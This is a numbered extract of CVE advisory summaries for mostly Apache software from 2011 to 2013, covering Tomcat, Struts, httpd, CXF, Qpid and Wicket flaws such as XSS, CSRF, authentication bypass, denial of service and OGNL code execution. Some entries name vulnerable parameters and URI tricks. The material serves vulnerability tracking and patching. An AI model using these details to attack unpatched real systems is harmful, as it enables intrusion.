10316| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
10317| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
10318| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
10319| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
10320| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
10321| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
10322| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
10323| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
10324| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
10325| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
10326| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10327| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10328| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10329| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
10330| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
10331| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
10332| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
10333| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
10334| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
10335| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
10336| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
10337| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
10338| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
10339| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
10340| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
10341| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
10342| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
10343| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
10344| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
10345| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
10346| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
10347| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
10348| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
10349| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10350| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
10351| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
10352| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
10353| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
10354| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
10355| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
10356| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
10357| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
10358| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
10359| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
10360| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
10361| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
10362| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
10363| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
10364| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
10365| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
10366| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
10367| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
10368| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
10369| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
10370| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
10371| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
10372| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
10373| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
10374| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
10375| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
10376| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
10377| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
10378| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
10379| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
10380| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
10381| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
10382| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
10383| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
10384| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
10385| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
10386| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
10387| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
10388| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
10389| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
10390| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
10391| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
10392| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
10393| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
10394| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
10395| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
10396| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
10397| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
10398| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
10399| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
10400| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
10401| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
10402| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
10403| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
10404| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
10405| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
10406| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
10407| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
10408| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
10409| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
10410| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
10411| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
10412| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
10413| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
10414| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
10415| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
10416| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
10417| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
10418| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
10419| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
10420| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
10421| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
10422| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
10423| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
10424| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
10425| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
10426| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
10427| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
10428| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
10429| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
10430| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
10431| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
10432| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
